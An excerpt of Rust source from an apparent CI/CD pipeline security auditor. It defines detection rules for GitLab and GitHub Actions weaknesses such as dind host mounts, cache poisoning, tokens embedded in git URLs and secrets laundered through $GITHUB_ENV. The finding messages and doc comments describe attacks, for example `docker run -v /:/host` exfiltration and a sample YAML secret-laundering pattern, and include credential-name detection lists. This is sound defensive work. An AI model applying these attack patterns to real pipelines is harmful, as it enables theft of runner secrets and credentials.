5250            match target.kind {
5251                NodeKind::Secret => sensitive.push(target.name.clone()),
5252                NodeKind::Identity => sensitive.push(target.name.clone()),
5253                _ => {}
5254            }
5255        }
5256
5257        if sensitive.is_empty() {
5258            continue;
5259        }
5260
5261        sensitive.sort();
5262        sensitive.dedup();
5263        // Cap the message length — corpora include jobs with dozens of vars.
5264        let preview = if sensitive.len() > 4 {
5265            format!(
5266                "{} (and {} more)",
5267                sensitive[..4].join(", "),
5268                sensitive.len() - 4
5269            )
5270        } else {
5271            sensitive.join(", ")
5272        };
5273
5274        findings.push(Finding {
5275            severity: Severity::High,
5276            category: FindingCategory::DindServiceGrantsHostAuthority,
5277            path: None,
5278            nodes_involved: vec![step.id],
5279            message: format!(
5280                "Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
5281                step.name, preview
5282            ),
5283            recommendation: Recommendation::Manual {
5284                action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
5285            },
5286            source: FindingSource::BuiltIn,
5287            extras: FindingExtras::default(),
5288        });
5289    }
5290
5291    findings
5292}
5293
5294/// Substrings (case-insensitive) that identify a GitLab security scanner job
5295/// either by job name or by an `extends:` template name.
5296const SCANNER_PATTERNS: &[&str] = &[
5297    "sast",
5298    "dast",
5299    "secret_detection",
5300    "secret-detection",
5301    "dependency_scanning",
5302    "dependency-scanning",
5303    "container_scanning",
5304    "container-scanning",
5305    "gitleaks",
5306    "trivy",
5307    "grype",
5308    "semgrep",
5309    "bandit",
5310    "snyk",
5311    "license_scanning",
5312    "license-scanning",
5313    "iac_scan",
5314    "iac-scan",
5315    "fuzz",
5316    "api_fuzzing",
5317    "api-fuzzing",
5318    "coverage_fuzzing",
5319    "coverage-fuzzing",
5320];
5321
5322fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
5323    let lower = step_name.to_ascii_lowercase();
5324    if SCANNER_PATTERNS.iter().any(|p| lower.contains(p)) {
5325        return true;
5326    }
5327    if let Some(ext) = extends {
5328        let elower = ext.to_ascii_lowercase();
5329        if SCANNER_PATTERNS.iter().any(|p| elower.contains(p)) {
5330            return true;
5331        }
5332    }
5333    false
5334}
5335
5336/// Rule: `security_job_silently_skipped` (Medium, Configuration).
5337///
5338/// A security-scanner job (matched by name or `extends:` template) runs with
5339/// `allow_failure: true` and no `rules:` clause that surfaces the failure.
5340/// The pipeline goes green even when the scan errors out — silent-pass is
5341/// worse than no scan because reviewers trust the badge.
5342///
5343/// We can't statically prove the absence of a "surface failures" rule from
5344/// YAML alone, so we fire whenever `allow_failure: true` is set on a scanner
5345/// job and let the operator confirm. The recommendation guides them to the
5346/// fix.
5347pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
5348    let mut findings = Vec::new();
5349
5350    for step in graph.nodes_of_kind(NodeKind::Step) {
5351        let allow_failure = step
5352            .metadata
5353            .get(META_GITLAB_ALLOW_FAILURE)
5354            .map(|v| v == "true")
5355            .unwrap_or(false);
5356        if !allow_failure {
5357            continue;
5358        }
5359
5360        let extends = step.metadata.get(META_GITLAB_EXTENDS);
5361        if !step_matches_scanner(&step.name, extends) {
5362            continue;
5363        }
5364
5365        let how = match extends {
5366            Some(e) => format!("matched by extends: {e}"),
5367            None => "matched by job name".to_string(),
5368        };
5369
5370        findings.push(Finding {
5371            severity: Severity::Medium,
5372            category: FindingCategory::SecurityJobSilentlySkipped,
5373            path: None,
5374            nodes_involved: vec![step.id],
5375            message: format!(
5376                "Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
5377                step.name
5378            ),
5379            recommendation: Recommendation::Manual {
5380                action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
5381            },
5382            source: FindingSource::BuiltIn,
5383            extras: FindingExtras::default(),
5384        });
5385    }
5386
5387    findings
5388}
5389
5390/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
5391///
5392/// A GitLab `trigger:` job (downstream / child pipeline) either runs in
5393/// `merge_request_event` context OR is a *dynamic* child pipeline whose
5394/// included YAML comes from a previous job's `artifact:`. Both shapes mean
5395/// untrusted input shapes the pipeline that runs with the parent project's
5396/// CI_JOB_TOKEN and secrets.
5397pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5398    let graph_is_mr = graph
5399        .metadata
5400        .get(META_TRIGGER)
5401        .map(|v| v == "merge_request")
5402        .unwrap_or(false);
5403
5404    let mut findings = Vec::new();
5405
5406    for step in graph.nodes_of_kind(NodeKind::Step) {
5407        let kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
5408            Some(k) => k.as_str(),
5409            None => continue,
5410        };
5411
5412        let is_dynamic = kind == "dynamic";
5413        let is_mr = graph_is_mr;
5414
5415        if !is_dynamic && !is_mr {
5416            continue;
5417        }
5418
5419        let mut reasons: Vec<&str> = Vec::new();
5420        if is_dynamic {
5421            reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
5422        }
5423        if is_mr {
5424            reasons.push(
5425                "runs in merge_request_event context — fork code shapes the downstream pipeline",
5426            );
5427        }
5428        let why = reasons.join(" AND ");
5429
5430        findings.push(Finding {
5431            severity: Severity::Medium,
5432            category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
5433            path: None,
5434            nodes_involved: vec![step.id],
5435            message: format!(
5436                "Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
5437                step.name
5438            ),
5439            recommendation: Recommendation::Manual {
5440                action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
5441            },
5442            source: FindingSource::BuiltIn,
5443            extras: FindingExtras::default(),
5444        });
5445    }
5446
5447    findings
5448}
5449
5450/// Heuristic: cache keys that cross trust boundaries. Returns `Some(reason)`
5451/// when the key is one of the dangerous shapes, `None` when the key is
5452/// scoped tightly enough.
5453fn unsafe_cache_key(key: &str) -> Option<&'static str> {
5454    let trimmed = key.trim();
5455    if trimmed.is_empty() {
5456        // GitLab default key when none is set: `default` — same blast radius as hardcoded.
5457        return Some("absent (defaults to a single shared 'default' key per runner)");
5458    }
5459    // CI_JOB_NAME alone — same name across MR + main = shared key.
5460    if trimmed == "$CI_JOB_NAME"
5461        || trimmed == "${CI_JOB_NAME}"
5462        || trimmed.eq_ignore_ascii_case("$ci_job_name")
5463    {
5464        return Some(
5465            "`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache",
5466        );
5467    }
5468    // CI_COMMIT_REF_SLUG alone — handled by caller (depends on policy).
5469    // Otherwise: any key without a $-interpolation is hardcoded → shared.
5470    if !trimmed.contains('$') {
5471        return Some("hardcoded — every job and every branch share the same cache");
5472    }
5473    None
5474}
5475
5476/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
5477///
5478/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
5479/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
5480/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
5481/// malicious `node_modules/` cache that the next default-branch job
5482/// downloads and executes.
5483pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
5484    let mut findings = Vec::new();
5485
5486    for step in graph.nodes_of_kind(NodeKind::Step) {
5487        let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
5488            Some(k) => k,
5489            None => continue,
5490        };
5491        let policy = step
5492            .metadata
5493            .get(META_GITLAB_CACHE_POLICY)
5494            .map(|s| s.as_str())
5495            .unwrap_or("pull-push"); // GitLab's runtime default
5496
5497        // pull-only consumers cannot poison the cache — skip those
5498        let is_pull_only = matches!(policy, "pull");
5499
5500        let trimmed = key.trim();
5501
5502        // Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
5503        // restrict themselves to `policy: pull`. Without that restriction, an
5504        // MR job pushes a cache the next protected-branch job downloads
5505        // (refs are *namespaced* but not *isolated* — the same key on `main`
5506        // shadows over time and the runner's per-key store is shared).
5507        let is_ref_slug = trimmed == "$CI_COMMIT_REF_SLUG"
5508            || trimmed == "${CI_COMMIT_REF_SLUG}"
5509            || trimmed.eq_ignore_ascii_case("$ci_commit_ref_slug");
5510        if is_ref_slug {
5511            if !is_pull_only {
5512                findings.push(Finding {
5513                    severity: Severity::Medium,
5514                    category: FindingCategory::CacheKeyCrossesTrustBoundary,
5515                    path: None,
5516                    nodes_involved: vec![step.id],
5517                    message: format!(
5518                        "Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
5519                        step.name
5520                    ),
5521                    recommendation: Recommendation::Manual {
5522                        action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
5523                    },
5524                    source: FindingSource::BuiltIn,
5525                    extras: FindingExtras::default(),
5526                });
5527            }
5528            continue;
5529        }
5530
5531        if let Some(reason) = unsafe_cache_key(key) {
5532            findings.push(Finding {
5533                severity: Severity::Medium,
5534                category: FindingCategory::CacheKeyCrossesTrustBoundary,
5535                path: None,
5536                nodes_involved: vec![step.id],
5537                message: format!(
5538                    "Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
5539                    step.name
5540                ),
5541                recommendation: Recommendation::Manual {
5542                    action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
5543                },
5544                source: FindingSource::BuiltIn,
5545                extras: FindingExtras::default(),
5546            });
5547        }
5548    }
5549
5550    findings
5551}
5552
5553/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
5554/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
5555/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
5556mod taudit_parse_gitlab_include_view {
5557    use serde::Deserialize;
5558    #[derive(Debug, Clone, Deserialize)]
5559    pub struct IncludeView {
5560        pub kind: String,
5561        pub target: String,
5562        pub git_ref: String,
5563    }
5564}
5565
5566/// Rule: a CI script body constructs an HTTPS git URL with credentials
5567/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
5568/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
5569/// `git fetch`, `git ls-remote`).
5570///
5571/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
5572/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
5573/// implemented byte-by-byte to keep the dependency surface minimal.
5574///
5575/// Severity: **High**. Embedded credentials persist in `.git/config`,
5576/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
5577/// land in `GIT_TRACE` output when set, and may be uploaded as part of
5578/// any artifact that bundles the workspace.
5579pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
5580    let mut findings = Vec::new();
5581
5582    for step in graph.nodes_of_kind(NodeKind::Step) {
5583        let body = match step.metadata.get(META_SCRIPT_BODY) {
5584            Some(b) if !b.trim().is_empty() => b,
5585            _ => continue,
5586        };
5587
5588        let hits = find_credential_embedded_git_urls(body);
5589        if hits.is_empty() {
5590            continue;
5591        }
5592
5593        // Cap message previews so we don't spam logs with huge URLs.
5594        let preview: String = hits
5595            .iter()
5596            .take(2)
5597            .map(|s| s.as_str())
5598            .collect::<Vec<_>>()
5599            .join(", ");
5600        let suffix = if hits.len() > 2 {
5601            format!(", and {} more", hits.len() - 2)
5602        } else {
5603            String::new()
5604        };
5605
5606        findings.push(Finding {
5607            severity: Severity::High,
5608            category: FindingCategory::PatEmbeddedInGitRemoteUrl,
5609            path: None,
5610            nodes_involved: vec![step.id],
5611            message: format!(
5612                "Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
5613                step.name, preview, suffix
5614            ),
5615            recommendation: Recommendation::Manual {
5616                action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
5617            },
5618            source: FindingSource::BuiltIn,
5619            extras: FindingExtras::default(),
5620        });
5621    }
5622
5623    findings
5624}
5625
5626/// Find substrings in `body` that look like
5627/// `https://<userpart>:<token-var-ref>@host`. Returns up to 8 unique hits
5628/// (stable order). The token variable is required to look like a credential
5629/// name (TOKEN/PAT/PASSWORD/PASSWD/KEY/SECRET) — bare `$VAR` references
5630/// without a credential-shaped name don't fire to keep the false-positive
5631/// rate down.
5632fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
5633    let mut hits: Vec<String> = Vec::new();
5634    let bytes = body.as_bytes();
5635    let mut i = 0usize;
5636    let needle = b"https://";
5637
5638    while i + needle.len() <= bytes.len() {
5639        if &bytes[i..i + needle.len()] != needle {
5640            i += 1;
5641            continue;
5642        }
5643        // Find the end of the URL "authority" component — terminator is the
5644        // next `/`, whitespace, quote, or end-of-string.
5645        let mut end = i + needle.len();
5646        while end < bytes.len() {
5647            let c = bytes[end];
5648            if c == b'/'
5649                || c == b' '
5650                || c == b'\t'
5651                || c == b'\n'
5652                || c == b'\r'
5653                || c == b'"'
5654                || c == b'\''
5655                || c == b'`'
5656            {
5657                break;
5658            }
5659            end += 1;
5660        }
5661        let authority = &body[i + needle.len()..end];
5662
5663        if url_authority_has_embedded_credential_var(authority) {
5664            // Capture the full URL up to the path delimiter for the message.
5665            let urlend = end;
5666            let url = &body[i..urlend];
5667            let url_short = if url.len() > 120 {
5668                format!("{}…", &url[..120])
5669            } else {
5670                url.to_string()
5671            };
5672            if !hits.contains(&url_short) {
5673                hits.push(url_short);
5674                if hits.len() == 8 {
5675                    break;
5676                }
5677            }
5678        }
5679
5680        i = end.max(i + 1);
5681    }
5682
5683    hits
5684}
5685
5686/// Decide whether a URL's authority component (everything after `https://`
5687/// and before the path) contains a credential-shaped variable reference of
5688/// the form `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
5689fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
5690    // Must contain both ':' and '@' with ':' before '@'.
5691    let at = match authority.find('@') {
5692        Some(p) => p,
5693        None => return false,
5694    };
5695    let userinfo = &authority[..at];
5696    let colon = match userinfo.find(':') {
5697        Some(p) => p,
5698        None => return false,
5699    };
5700    let pw_part = &userinfo[colon + 1..];
5701    if pw_part.is_empty() {
5702        return false;
5703    }
5704    // Strip optional `${...}` braces so we can inspect the variable name.
5705    let pw_inner = pw_part.trim_start_matches('$');
5706    let pw_inner = pw_inner.trim_start_matches('{').trim_end_matches('}');
5707    // Variable name must look like an env var (uppercase, digits, underscores)
5708    // and contain a credential-shaped fragment.
5709    if pw_inner.is_empty() {
5710        return false;
5711    }
5712    let looks_like_var = pw_inner
5713        .chars()
5714        .all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_');
5715    if !looks_like_var {
5716        return false;
5717    }
5718    const CRED_FRAGMENTS: &[&str] = &[
5719        "TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
5720    ];
5721    CRED_FRAGMENTS.iter().any(|frag| pw_inner.contains(frag))
5722}
5723
5724/// Rule: a CI script triggers a different project's pipeline via the GitLab
5725/// REST API using `CI_JOB_TOKEN` and forwards variables via the
5726/// `variables[KEY]=value` query/form parameter. Cross-project authority
5727/// bridge — the downstream project's security depends on the trust contract
5728/// between the two projects, and variable values flowing across that
5729/// boundary may originate from MR/fork context the attacker controls.
5730///
5731/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
5732/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
5733/// that case explicitly so operators see the elevated risk.
5734pub fn ci_token_triggers_downstream_with_variable_passthrough(
5735    graph: &AuthorityGraph,
5736) -> Vec<Finding> {
5737    let mut findings = Vec::new();
5738    let pipeline_is_mr_triggered = graph
5739        .metadata
5740        .get(META_TRIGGER)
5741        .map(|t| t == "merge_request")
5742        .unwrap_or(false);
5743
5744    for step in graph.nodes_of_kind(NodeKind::Step) {
5745        let body = match step.metadata.get(META_SCRIPT_BODY) {
5746            Some(b) if !b.trim().is_empty() => b,
5747            _ => continue,
5748        };
5749
5750        if !script_triggers_downstream_with_passthrough(body) {
5751            continue;
5752        }
5753
5754        let suffix = if pipeline_is_mr_triggered {
5755            " (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
5756        } else {
5757            ""
5758        };
5759
5760        findings.push(Finding {
5761            severity: Severity::Medium,
5762            category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
5763            path: None,
5764            nodes_involved: vec![step.id],
5765            message: format!(
5766                "Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
5767                step.name, suffix
5768            ),
5769            recommendation: Recommendation::Manual {
5770                action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
5771            },
5772            source: FindingSource::BuiltIn,
5773                extras: FindingExtras::default(),
5774});
5775    }
5776
5777    findings
5778}
5779
5780/// Returns true if `body` contains a `curl` (or wget) call that hits a
5781/// GitLab `/trigger/pipeline` endpoint with both `CI_JOB_TOKEN` and a
5782/// `variables[…]` field. We accept either query-string form
5783/// (`variables[X]=...`) or form-data form (`-F "variables[X]=..."`).
5784fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
5785    let lower = body.to_lowercase();
5786    // Match a triggering call: must mention `trigger/pipeline` and reference
5787    // CI_JOB_TOKEN, plus carry a `variables[` token.
5788    let trigger_endpoint = lower.contains("trigger/pipeline")
5789        || lower.contains("/api/v4/projects/") && lower.contains("/trigger");
5790    if !trigger_endpoint {
5791        return false;
5792    }
5793    let has_token = lower.contains("ci_job_token");
5794    if !has_token {
5795        return false;
5796    }
5797    body.contains("variables[")
5798}
5799
5800/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
5801/// contents become pipeline variables for any consumer linked via `needs:`
5802/// or `dependencies:`. A consumer in a later stage that targets a
5803/// production-named environment inherits those variables transparently.
5804/// Producer-side risk amplifies when the script reads attacker-influenced
5805/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
5806/// `CI_COMMIT_TAG`, branch/commit derived strings).
5807///
5808/// Severity: **High** when a producer→consumer chain exists with a
5809/// production-like environment on the consumer; **Medium** when the chain
5810/// exists but no production environment is detected (still a covert
5811/// variable-promotion channel).
5812pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
5813    let mut findings = Vec::new();
5814
5815    // Build (producer name -> producer step id, dotenv file) index.
5816    let mut producers: std::collections::HashMap<String, (NodeId, String)> =
5817        std::collections::HashMap::new();
5818    for step in graph.nodes_of_kind(NodeKind::Step) {
5819        if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
5820            if let Some(job) = step.metadata.get(META_JOB_NAME) {
5821                producers.insert(job.clone(), (step.id, file.clone()));
5822            }
5823        }
5824    }
5825    if producers.is_empty() {
5826        return findings;
5827    }
5828
5829    for consumer in graph.nodes_of_kind(NodeKind::Step) {
5830        let needs_csv = match consumer.metadata.get(META_NEEDS) {
5831            Some(s) if !s.is_empty() => s,
5832            _ => continue,
5833        };
5834        let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
5835        let matched: Vec<&(NodeId, String)> = upstream_jobs
5836            .iter()
5837            .filter_map(|j| producers.get(*j))
5838            .collect();
5839        if matched.is_empty() {
5840            continue;
5841        }
5842
5843        let env_name = consumer
5844            .metadata
5845            .get(META_ENVIRONMENT_NAME)
5846            .map(String::as_str)
5847            .unwrap_or("");
5848        // Production-like signal: explicit `environment.name:` value, OR
5849        // (fallback) the job name itself encodes a production marker.
5850        // GitLab pipelines often skip the explicit `environment:` block
5851        // and rely on stage/job naming conventions like `deploy-prod`.
5852        let consumer_job = consumer
5853            .metadata
5854            .get(META_JOB_NAME)
5855            .map(String::as_str)
5856            .unwrap_or(consumer.name.as_str());
5857        let production_like =
5858            is_production_environment(env_name) || is_production_environment(consumer_job);
5859
5860        // Decide elevation: production-like consumer environment OR
5861        // producer script ingests attacker-influenced CI variables.
5862        let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
5863            graph
5864                .node(*pid)
5865                .and_then(|n| n.metadata.get(META_SCRIPT_BODY))
5866                .map(|b| script_uses_attacker_influenced_ci_var(b))
5867                .unwrap_or(false)
5868        });
5869
5870        if !production_like && !producer_uses_untrusted_input {
5871            continue; // benign dotenv flow — skip
5872        }
5873
5874        let severity = if production_like {
5875            Severity::High
5876        } else {
5877            Severity::Medium
5878        };
5879
5880        let producer_names: Vec<String> = upstream_jobs
5881            .iter()
5882            .filter(|j| producers.contains_key(**j))
5883            .map(|s| (*s).to_string())
5884            .collect();
5885
5886        let env_suffix = if production_like {
5887            if env_name.is_empty() {
5888                format!(" targeting production-like job name '{consumer_job}'")
5889            } else {
5890                format!(" targeting production-like environment '{env_name}'")
5891            }
5892        } else {
5893            String::new()
5894        };
5895        let trust_suffix = if producer_uses_untrusted_input {
5896            " (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
5897        } else {
5898            ""
5899        };
5900
5901        let mut nodes_involved = vec![consumer.id];
5902        nodes_involved.extend(matched.iter().map(|(id, _)| *id));
5903
5904        findings.push(Finding {
5905            severity,
5906            category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
5907            path: None,
5908            nodes_involved,
5909            message: format!(
5910                "Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
5911                consumer.name,
5912                producer_names.join(", "),
5913                env_suffix,
5914                trust_suffix
5915            ),
5916            recommendation: Recommendation::Manual {
5917                action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
5918            },
5919            source: FindingSource::BuiltIn,
5920                extras: FindingExtras::default(),
5921});
5922    }
5923
5924    findings
5925}
5926
5927/// True when an environment name matches common production-like patterns.
5928fn is_production_environment(name: &str) -> bool {
5929    if name.is_empty() {
5930        return false;
5931    }
5932    let lower = name.to_lowercase();
5933    const TOKENS: &[&str] = &["prod", "production", "prd", "live"];
5934    for token in TOKENS {
5935        // Match either as a whole word or a `/`-separated segment, e.g.
5936        // `production/eu-west-1`, `prod-cluster`.
5937        if lower == *token {
5938            return true;
5939        }
5940        if lower.starts_with(&format!("{token}-"))
5941            || lower.starts_with(&format!("{token}/"))
5942            || lower.contains(&format!("/{token}/"))
5943            || lower.contains(&format!("-{token}-"))
5944            || lower.ends_with(&format!("/{token}"))
5945            || lower.ends_with(&format!("-{token}"))
5946        {
5947            return true;
5948        }
5949    }
5950    false
5951}
5952
5953/// True when an inline script reads CI variables that carry attacker-controllable
5954/// content (branch names, MR source/target refs, tag refs, commit messages).
5955fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
5956    const NEEDLES: &[&str] = &[
5957        "CI_COMMIT_REF_NAME",
5958        "CI_COMMIT_BRANCH",
5959        "CI_COMMIT_TAG",
5960        "CI_COMMIT_MESSAGE",
5961        "CI_COMMIT_TITLE",
5962        "CI_COMMIT_DESCRIPTION",
5963        "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
5964        "CI_MERGE_REQUEST_TITLE",
5965        "CI_MERGE_REQUEST_DESCRIPTION",
5966    ];
5967    NEEDLES.iter().any(|n| script.contains(n))
5968}
5969
5970/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
5971/// in the same job — composition gap between `self_mutating_pipeline` (the
5972/// gate-write detector) and `untrusted_with_authority` (the direct-access
5973/// detector).
5974///
5975/// **Pattern (R2 attack #3):**
5976/// ```yaml
5977/// jobs:
5978///   build:
5979///     steps:
5980///       - name: setup
5981///         run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV   # writer
5982///       - uses: some-org/deploy@main                                        # untrusted
5983///         with:
5984///           key: ${{ env.CLOUD_KEY }}                                       # consumer
5985/// ```
5986/// The writer trips `self_mutating_pipeline`. The consumer never gets a
5987/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
5988/// env, not the secrets store) so neither `untrusted_with_authority` nor
5989/// `authority_propagation` fire — the env-gate launders the trust zone.
5990///
5991/// **Detection:** for every Step in the same job:
5992///   - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
5993///     Secret/Identity (the value being laundered must derive from authority)
5994///   - Consumer: appears later in the job (NodeId order tracks declaration
5995///     order), trust zone is `Untrusted` or `ThirdParty`, and carries
5996///     `META_READS_ENV = "true"` (stamped by the parser when the step
5997///     references `${{ env.X }}` in `with:` / `run:`)
5998///
5999/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
6000/// propagates within a job, so cross-job pairs are not flagged.
6001pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
6002    let mut findings = Vec::new();
6003
6004    // Step 1: enumerate writer-with-secret nodes, paired with the laundered
6005    // authority names so the finding message can name them. We capture the
6006    // node id in declaration order so the same-job ordering check below is a
6007    // simple comparison rather than an O(n²) scan.
6008    struct Writer<'a> {
6009        id: NodeId,
6010        job: &'a str,
6011        name: &'a str,
6012        secrets: Vec<&'a str>,
6013    }
6014    let writers: Vec<Writer<'_>> = graph
6015        .nodes_of_kind(NodeKind::Step)
6016        .filter(|step| {
6017            step.metadata
6018                .get(META_WRITES_ENV_GATE)
6019                .map(|v| v == "true")
6020                .unwrap_or(false)
6021        })
6022        .filter_map(|step| {
6023            let job = step.metadata.get(META_JOB_NAME)?.as_str();
6024            // Must hold authority — collect Secret/Identity names reachable
6025            // via HasAccessTo. An env-gate write that doesn't carry any
6026            // authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
6027            // case; not in scope for this rule.
6028            let secrets: Vec<&str> = graph
6029                .edges_from(step.id)
6030                .filter(|e| e.kind == EdgeKind::HasAccessTo)
6031                .filter_map(|e| graph.node(e.to))
6032                .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6033                .map(|n| n.name.as_str())
6034                .collect();
6035            if secrets.is_empty() {
6036                return None;
6037            }
6038            Some(Writer {
6039                id: step.id,
6040                job,
6041                name: step.name.as_str(),
6042                secrets,
6043            })
6044        })
6045        .collect();
6046
6047    if writers.is_empty() {
6048        return findings;
6049    }
6050
6051    // Step 2: for every consumer step that reads env, find the writer(s) it
6052    // could be laundering from.
6053    for consumer in graph.nodes_of_kind(NodeKind::Step) {
6054        // Consumer must read the runner env.
6055        let reads_env = consumer
6056            .metadata
6057            .get(META_READS_ENV)
6058            .map(|v| v == "true")
6059            .unwrap_or(false);
6060        if !reads_env {
6061            continue;
6062        }
6063
6064        // Consumer must run with reduced trust — first-party readers are
6065        // already accounted for elsewhere and would be a high-FP class.
6066        if !matches!(
6067            consumer.trust_zone,
6068            TrustZone::Untrusted | TrustZone::ThirdParty
6069        ) {
6070            continue;
6071        }
6072
6073        let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
6074            Some(j) => j.as_str(),
6075            None => continue,
6076        };
6077
6078        // Find writers in the same job that appear earlier (NodeId order
6079        // mirrors declaration order — see GHA parser, ADO parser).
6080        let upstream: Vec<&Writer<'_>> = writers
6081            .iter()
6082            .filter(|w| w.job == consumer_job && w.id < consumer.id)
6083            .collect();
6084
6085        if upstream.is_empty() {
6086            continue;
6087        }
6088
6089        // Aggregate the laundered authority names across all writers so
6090        // operators see the full set of credentials potentially reaching
6091        // the untrusted step. Stable ordering, dedup'd.
6092        let mut secret_labels: Vec<&str> = upstream
6093            .iter()
6094            .flat_map(|w| w.secrets.iter().copied())
6095            .collect();
6096        secret_labels.sort_unstable();
6097        secret_labels.dedup();
6098        let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
6099
6100        let mut nodes_involved = vec![consumer.id];
6101        nodes_involved.extend(upstream.iter().map(|w| w.id));
6102        // Include the laundered Secret/Identity nodes themselves so the
6103        // fingerprint and downstream consumers can attribute the finding
6104        // to a specific credential.
6105        for w in &upstream {
6106            for e in graph.edges_from(w.id) {
